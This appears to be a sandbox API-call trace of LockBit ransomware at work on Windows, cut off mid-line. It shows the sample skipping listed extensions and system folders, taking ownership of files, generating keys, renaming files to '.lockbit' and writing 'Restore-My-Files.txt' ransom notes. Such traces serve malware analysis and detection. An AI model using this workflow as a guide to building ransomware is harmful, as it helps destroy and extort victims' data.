[0097.499] lstrcmpiW (lpString1=".cpl", lpString2=".ax") returned 1 [0097.499] lstrcmpiW (lpString1=".mod", lpString2=".ax") returned 1 [0097.499] lstrcmpiW (lpString1=".hta", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".icns", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".prf", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".rtp", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".diagcfg", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".msstyles", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".bin", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".shs", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".drv", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".wpx", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".bat", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".rom", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".msc", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".spl", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".ps1", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".msu", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".ics", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".key", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".mp3", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".reg", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".dll", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".ini", lpString2=".ax") returned 1 [0097.500] lstrcmpiW (lpString1=".idx", lpString2=".ax") returned 1 [0097.501] lstrcmpiW (lpString1=".sys", lpString2=".ax") returned 1 [0097.501] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0097.501] lstrcmpiW (lpString1=".ico", lpString2=".ax") returned 1 [0097.501] lstrcmpiW (lpString1=".lnk", lpString2=".ax") returned 1 [0097.501] lstrcmpiW (lpString1=".rdp", lpString2=".ax") returned 1 [0097.501] lstrcmpiW (lpString1=".lockbit", lpString2=".ax") returned 1 [0097.501] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="sonicsptransform.ax") returned -1 [0097.501] lstrcmpiW (lpString1="ntldr", lpString2="sonicsptransform.ax") returned -1 [0097.501] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="sonicsptransform.ax") returned -1 [0097.501] lstrcmpiW (lpString1="bootsect.bak", lpString2="sonicsptransform.ax") returned -1 [0097.501] lstrcmpiW (lpString1="autorun.inf", lpString2="sonicsptransform.ax") returned -1 [0097.501] lstrcmpiW (lpString1="thumbs.db", lpString2="sonicsptransform.ax") returned 1 [0097.501] lstrcmpiW (lpString1="iconcache.db", lpString2="sonicsptransform.ax") returned -1 [0097.501] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker" | out: pszPath="C:\\\\Program Files\\DVD Maker\\") returned="" [0097.501] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\sonicsptransform.ax") returned=".ax" [0097.501] lstrcmpiW (lpString1=".rar", lpString2=".ax") returned 1 [0097.501] lstrcmpiW (lpString1=".zip", lpString2=".ax") returned 1 [0097.501] lstrcmpiW (lpString1=".7z", lpString2=".ax") returned -1 [0097.501] lstrcmpiW (lpString1=".ckp", lpString2=".ax") returned 1 [0097.501] lstrcmpiW (lpString1=".dacpac", lpString2=".ax") returned 1 [0097.501] lstrcmpiW (lpString1=".db", lpString2=".ax") returned 1 [0097.501] lstrcmpiW (lpString1=".db-shm", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".db-wal", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".db3", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".dbf", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".dbc", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".dbs", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".dbt", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".dbv", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".frm", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".mdf", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".mrg", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".mwb", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".myd", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".ndf", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".qry", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".sdb", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".sdf", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".sql", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".sqlite", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".sqlite3", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".sqlitedb", lpString2=".ax") returned 1 [0097.502] lstrcmpiW (lpString1=".tmd", lpString2=".ax") returned 1 [0097.502] wsprintfW (in: param_1=0x3d6cae0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\sonicsptransform.ax.lockbit") returned 55 [0097.503] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\sonicsptransform.ax" (normalized: "c:\\program files\\dvd maker\\sonicsptransform.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.505] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0097.506] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0097.506] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0097.507] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0097.509] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0097.509] RtlFreeAnsiString (AnsiString="\\") [0097.509] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6d158 | out: TokenHandle=0x3d6d158*=0x1194) returned 0x0 [0097.509] malloc (_Size=0x200) returned 0x77d800 [0097.509] NtQueryInformationToken (in: TokenHandle=0x1194, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6d150 | out: TokenInformation=0x77d800, ReturnLength=0x3d6d150) returned 0x0 [0097.509] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6cf0c, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0097.509] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6cf0c, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0097.509] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\sonicsptransform.ax", SecurityInformation=0x1, pSecurityDescriptor=0x3d6cf0c) returned 1 [0097.510] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\sonicsptransform.ax", SecurityInformation=0x4, pSecurityDescriptor=0x3d6cf0c) returned 1 [0097.511] CloseHandle (hObject=0x1194) returned 1 [0097.511] free (_Block=0x77d800) [0097.511] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\sonicsptransform.ax" (normalized: "c:\\program files\\dvd maker\\sonicsptransform.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0097.511] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0097.511] malloc (_Size=0x40068) returned 0x3d70048 [0097.511] GetFileSizeEx (in: hFile=0x1194, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=51712) returned 1 [0097.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.514] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0097.514] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0097.517] ReadFile (in: hFile=0x1194, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0097.520] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\sonicsptransform.ax.lockbit", NtPathName=0x3d6d138, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\sonicsptransform.ax.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0097.520] malloc (_Size=0x84) returned 0x1fa1360 [0097.520] NtSetInformationFile (FileHandle=0x1194, IoStatusBlock=0x3d6cf04, FileInformation=0x1fa1360, Length=0x84, FileInformationClass=0xa) returned 0x0 [0097.521] free (_Block=0x1fa1360) [0097.521] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\sonicsptransform.ax" | out: pszPath="C:\\\\Program Files\\DVD Maker") returned 1 [0097.521] wsprintfW (in: param_1=0x3d6ccf0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt") returned 48 [0097.521] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0097.521] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bb787f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bb787f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bdd9df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMM2CLIP.dll", cAlternateFileName="")) returned 1 [0097.521] lstrcmpiW (lpString1=".", lpString2="WMM2CLIP.dll") returned -1 [0097.521] lstrcmpiW (lpString1="..", lpString2="WMM2CLIP.dll") returned -1 [0097.521] PathFindExtensionW (pszPath="WMM2CLIP.dll") returned=".dll" [0097.521] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0097.521] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0097.521] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0097.521] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0097.521] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0097.522] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0097.522] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0097.522] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0097.522] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0097.522] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0097.522] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0097.522] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0097.522] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0097.523] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0097.523] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0097.523] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0097.523] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0097.523] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0097.523] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0097.523] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0097.523] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0097.523] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0097.523] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0097.523] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bb787f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bb787f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bdd9df, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMM2CLIP.dll", cAlternateFileName="")) returned 0 [0097.523] FindClose (in: hFindFile=0x55fdb8 | out: hFindFile=0x55fdb8) returned 1 [0097.524] FindNextFileW (in: hFindFile=0x55fd78, lpFindFileData=0x3d6e1c0 | out: lpFindFileData=0x3d6e1c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0097.524] lstrcmpiW (lpString1=".", lpString2="Internet Explorer") returned -1 [0097.524] lstrcmpiW (lpString1="..", lpString2="Internet Explorer") returned -1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="$windows.~bt") returned 1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="intel") returned 1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="msocache") returned -1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="$recycle.bin") returned 1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="$windows.~ws") returned 1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="tor browser") returned -1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="boot") returned 1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="system volume information") returned -1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="perflogs") returned -1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="google") returned 1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="application data") returned 1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="windows") returned -1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="windows.old") returned -1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="appdata") returned 1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="Windows nt") returned -1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="Msbuild") returned -1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="Microsoft") returned -1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="All users") returned 1 [0097.524] lstrcmpiW (lpString1="Internet Explorer", lpString2="mozilla") returned -1 [0097.525] lstrcmpiW (lpString1="Internet Explorer", lpString2="Microsoft.NET") returned -1 [0097.525] lstrcmpiW (lpString1="Internet Explorer", lpString2="microsoft shared") returned -1 [0097.525] lstrcmpiW (lpString1="Internet Explorer", lpString2="Internet Explorer") returned 0 [0097.525] FindNextFileW (in: hFindFile=0x55fd78, lpFindFileData=0x3d6e1c0 | out: lpFindFileData=0x3d6e1c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdbcd6840, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcd6840, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0097.525] lstrcmpiW (lpString1=".", lpString2="Microsoft Analysis Services") returned -1 [0097.525] lstrcmpiW (lpString1="..", lpString2="Microsoft Analysis Services") returned -1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="$windows.~bt") returned 1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="intel") returned 1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="msocache") returned -1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="$recycle.bin") returned 1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="$windows.~ws") returned 1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="tor browser") returned -1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="boot") returned 1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="system volume information") returned -1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="perflogs") returned -1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="google") returned 1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="application data") returned 1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="windows") returned -1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="windows.old") returned -1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="appdata") returned 1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="Windows nt") returned -1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="Msbuild") returned -1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="Microsoft") returned 1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="All users") returned 1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="mozilla") returned -1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="Microsoft.NET") returned -1 [0097.525] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="microsoft shared") returned -1 [0097.526] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="Internet Explorer") returned 1 [0097.526] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="common files") returned 1 [0097.526] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="opera") returned -1 [0097.526] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="Windows Journal") returned -1 [0097.526] wsprintfW (in: param_1=0x3d6dda0, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services") returned 45 [0097.526] wsprintfW (in: param_1=0x3d6d178, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\*") returned 47 [0097.526] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6d598, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6d598) returned 0x55fdb8 [0097.526] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0097.526] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdbcd6840, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbcd6840, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.526] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0097.526] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0097.526] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 1 [0097.526] lstrcmpiW (lpString1=".", lpString2="AS OLEDB") returned -1 [0097.526] lstrcmpiW (lpString1="..", lpString2="AS OLEDB") returned -1 [0097.526] lstrcmpiW (lpString1="AS OLEDB", lpString2="$windows.~bt") returned 1 [0097.526] lstrcmpiW (lpString1="AS OLEDB", lpString2="intel") returned -1 [0097.526] lstrcmpiW (lpString1="AS OLEDB", lpString2="msocache") returned -1 [0097.526] lstrcmpiW (lpString1="AS OLEDB", lpString2="$recycle.bin") returned 1 [0097.526] lstrcmpiW (lpString1="AS OLEDB", lpString2="$windows.~ws") returned 1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="tor browser") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="boot") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="system volume information") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="perflogs") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="google") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="application data") returned 1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="windows") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="windows.old") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="appdata") returned 1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="Windows nt") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="Msbuild") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="Microsoft") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="All users") returned 1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="mozilla") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="Microsoft.NET") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="microsoft shared") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="Internet Explorer") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="common files") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="opera") returned -1 [0097.527] lstrcmpiW (lpString1="AS OLEDB", lpString2="Windows Journal") returned -1 [0097.527] wsprintfW (in: param_1=0x3d6d178, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB") returned 54 [0097.527] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*") returned 56 [0097.527] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6c970, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6c970) returned 0x55fdf8 [0097.528] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0097.528] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.528] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0097.528] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0097.528] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10", cAlternateFileName="")) returned 1 [0097.528] lstrcmpiW (lpString1=".", lpString2="10") returned -1 [0097.528] lstrcmpiW (lpString1="..", lpString2="10") returned -1 [0097.528] lstrcmpiW (lpString1="10", lpString2="$windows.~bt") returned 1 [0097.528] lstrcmpiW (lpString1="10", lpString2="intel") returned -1 [0097.528] lstrcmpiW (lpString1="10", lpString2="msocache") returned -1 [0097.528] lstrcmpiW (lpString1="10", lpString2="$recycle.bin") returned 1 [0097.528] lstrcmpiW (lpString1="10", lpString2="$windows.~ws") returned 1 [0097.528] lstrcmpiW (lpString1="10", lpString2="tor browser") returned -1 [0097.528] lstrcmpiW (lpString1="10", lpString2="boot") returned -1 [0097.528] lstrcmpiW (lpString1="10", lpString2="system volume information") returned -1 [0097.528] lstrcmpiW (lpString1="10", lpString2="perflogs") returned -1 [0097.528] lstrcmpiW (lpString1="10", lpString2="google") returned -1 [0097.528] lstrcmpiW (lpString1="10", lpString2="application data") returned -1 [0097.529] lstrcmpiW (lpString1="10", lpString2="windows") returned -1 [0097.529] lstrcmpiW (lpString1="10", lpString2="windows.old") returned -1 [0097.529] lstrcmpiW (lpString1="10", lpString2="appdata") returned -1 [0097.529] lstrcmpiW (lpString1="10", lpString2="Windows nt") returned -1 [0097.529] lstrcmpiW (lpString1="10", lpString2="Msbuild") returned -1 [0097.529] lstrcmpiW (lpString1="10", lpString2="Microsoft") returned -1 [0097.529] lstrcmpiW (lpString1="10", lpString2="All users") returned -1 [0097.529] lstrcmpiW (lpString1="10", lpString2="mozilla") returned -1 [0097.529] 